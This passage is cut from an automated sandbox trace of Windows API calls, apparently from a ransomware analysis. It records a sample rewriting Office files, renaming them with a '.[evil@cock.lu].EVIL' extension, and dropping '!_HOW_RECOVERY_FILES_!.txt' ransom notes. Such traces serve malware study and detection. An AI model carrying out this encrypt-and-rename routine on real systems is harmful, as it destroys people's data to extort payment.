Office\\Office16\\OSPPREARM.EXE.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\office16\\ospprearm.exe.[evil@cock.lu].evil")) returned 1 [0099.338] ??_V@YAXPEAX@Z () returned 0x1 [0099.341] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE", dwFileAttributes=0x0) returned 0 [0099.341] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.341] wcsstr (_Str="SLERROR.XML", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.341] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 55 [0099.341] wcscmp (_String1="SLERROR.XML", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.341] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SLERROR.XML") returned 0x0 [0099.341] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 0x37 [0099.341] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.343] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x8df0, lpOverlapped=0x0) returned 1 [0099.361] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.361] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.362] _errno () returned 0x84b1160840 [0099.362] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.362] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x8e00, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x8e00, lpOverlapped=0x0) returned 1 [0099.362] CloseHandle (hObject=0x1a0) returned 1 [0099.362] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.362] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.363] __uncaught_exception () returned 0x84b1160800 [0099.363] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.363] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml.[evil@cock.lu].evil")) returned 1 [0099.363] ??_V@YAXPEAX@Z () returned 0x1 [0099.366] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML", dwFileAttributes=0x0) returned 0 [0099.366] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0 [0099.366] FindClose (in: hFindFile=0x84b11dd980 | out: hFindFile=0x84b11dd980) returned 1 [0099.366] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\Office16") returned 0x2b [0099.366] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0099.366] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0099.366] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\Office16\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.366] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0099.366] __uncaught_exception () returned 0x84b1160800 [0099.366] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.367] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0099.367] wcsstr (_Str="PackageManifests", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.367] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests") returned 51 [0099.367] wcscmp (_String1=".", _String2="PackageManifests") returned -1 [0099.367] wcscmp (_String1="..", _String2="PackageManifests") returned -1 [0099.367] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests") returned 0x33 [0099.367] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Microsoft Office\\PackageManifests" | out: _Destination="C:\\\\Program Files\\Microsoft Office\\PackageManifests") returned 0x0 [0099.367] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\*") returned="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\*" [0099.367] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11ddc80 [0099.434] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.434] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\.") returned 53 [0099.434] wcscmp (_String1=".", _String2=".") returned 0 [0099.434] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.482] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.482] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\..") returned 54 [0099.482] wcscmp (_String1=".", _String2="..") returned -1 [0099.482] wcscmp (_String1="..", _String2="..") returned 0 [0099.482] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.482] wcsstr (_Str="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.482] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 105 [0099.482] wcscmp (_String1="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.482] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 0x0 [0099.482] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 0x69 [0099.482] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.484] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x5eb83, lpOverlapped=0x0) returned 1 [0099.532] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.532] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.532] _errno () returned 0x84b1160840 [0099.533] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.533] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x5eba0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x5eba0, lpOverlapped=0x0) returned 1 [0099.534] CloseHandle (hObject=0x1a0) returned 1 [0099.534] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.534] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.534] __uncaught_exception () returned 0x84b1160800 [0099.534] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.534] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.535] ??_V@YAXPEAX@Z () returned 0x1 [0099.538] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.538] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.538] wcsstr (_Str="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.538] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 105 [0099.538] wcscmp (_String1="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.538] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 0x0 [0099.538] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 0x69 [0099.538] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.539] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x74c, lpOverlapped=0x0) returned 1 [0099.560] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.560] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.560] _errno () returned 0x84b1160840 [0099.560] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.560] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x760, lpOverlapped=0x0) returned 1 [0099.560] CloseHandle (hObject=0x1a0) returned 1 [0099.560] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.560] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.560] __uncaught_exception () returned 0x84b1160800 [0099.560] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.561] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.561] ??_V@YAXPEAX@Z () returned 0x1 [0099.564] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.564] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.564] wcsstr (_Str="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.564] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 105 [0099.564] wcscmp (_String1="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.564] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 0x0 [0099.564] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 0x69 [0099.564] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.566] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fde1e0*=0xc595e, lpOverlapped=0x0) returned 1 [0099.600] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.600] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.600] _errno () returned 0x84b1160840 [0099.602] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.602] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xc5960, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0xc5960, lpOverlapped=0x0) returned 1 [0099.603] CloseHandle (hObject=0x1a0) returned 1 [0099.603] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.603] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.604] __uncaught_exception () returned 0x84b1160800 [0099.604] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.604] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.604] ??_V@YAXPEAX@Z () returned 0x1 [0099.607] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.607] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.607] wcsstr (_Str="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.607] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 105 [0099.607] wcscmp (_String1="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.607] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 0x0 [0099.607] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 0x69 [0099.607] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.609] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x63c, lpOverlapped=0x0) returned 1 [0099.615] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.615] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.615] _errno () returned 0x84b1160840 [0099.615] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.615] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x640, lpOverlapped=0x0) returned 1 [0099.616] CloseHandle (hObject=0x1a0) returned 1 [0099.616] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.616] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.616] __uncaught_exception () returned 0x84b1160800 [0099.616] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.616] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.617] ??_V@YAXPEAX@Z () returned 0x1 [0099.619] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.619] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.619] wcsstr (_Str="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.619] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 105 [0099.619] wcscmp (_String1="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.619] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 0x0 [0099.619] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 0x69 [0099.619] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.621] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x802d5, lpOverlapped=0x0) returned 1 [0099.663] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.663] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.663] _errno () returned 0x84b1160840 [0099.664] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.664] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x802e0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x802e0, lpOverlapped=0x0) returned 1 [0099.664] CloseHandle (hObject=0x1a0) returned 1 [0099.665] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0099.665] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0099.665] __uncaught_exception () returned 0x84b1160800 [0099.665] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0099.665] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0099.666] ??_V@YAXPEAX@Z () returned 0x1 [0099.668] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0099.668] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0099.668] wcsstr (_Str="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0099.668] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 105 [0099.668] wcscmp (_String1="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0099.668] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 0x0 [0099.668] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 0x69 [0099.669] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0099.670] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x56a, lpOverlapped=0x0) returned 1 [0099.677] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.677] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0099.677] _errno () returned 0x84b1160840 [0099.677] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.677] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x580, lpOverlapped=0x0) returned 1 [0099.677] CloseHandle (hObject=0x1a0) 